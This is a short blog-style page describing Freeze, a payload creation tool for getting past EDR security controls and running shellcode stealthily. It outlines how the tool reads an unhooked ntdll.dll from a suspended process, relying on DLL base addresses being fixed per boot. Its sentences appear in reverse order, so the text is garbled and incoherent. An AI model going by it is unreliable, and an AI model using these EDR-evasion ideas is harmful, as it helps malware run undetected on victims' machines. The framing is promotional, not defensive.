![]() ![]() With this information, we can use the API ReadProcessMemory to read a process' memory. Since the address of every DLL is the same place per boot, we can pull this information from our own process and never have to enumerate the suspended process to find the address. This means that we don't need to enumerate a remote process information to find the base address of its ntdll.dll because it is the same in all processes including the one that we control. What happens with DLLs, (specifically known system DLLs) is that the address space is randomized once at boot time. Now, this is where it gets interesting because while ASLR works, it does not work for position-independent code such as DLLs. ASLR randomizes the address space inside of a process, to ensure that all memory-mapped objects, the stack, the heap, and the executable program itself, are unique. ASLR is a security mechanism to prevent stack memory corruption-based vulnerabilities. This is where address space layout randomization (ASLR) comes into play. In order to use this clean suspended process to remove hooks from Freeze loader, we need a way to programmatically find and read the clean suspended process' memory. You can also see that no EDR DLLs are loaded, meaning that the syscalls located in Ntdll.dll are unmodified. If we create a process in a suspend state (one that is frozen in time), we can see that no other DLLs are loaded, except for Ntdll.dll. In looking at Windows syscalls in Ntdll.dll, we can see that nothing is hooked yet. This means that there is a bit of a delay before an EDR can be loaded and start hooking and modifying the assembly of system DLLs. This happens before any EDR DLLs are loaded. When a process is created, Ntdll.dll is the first DLL that is loaded. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls. If you want to learn more about the techniques utilized in this framework, please take a look at SourceZero Blog Descriptionįreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |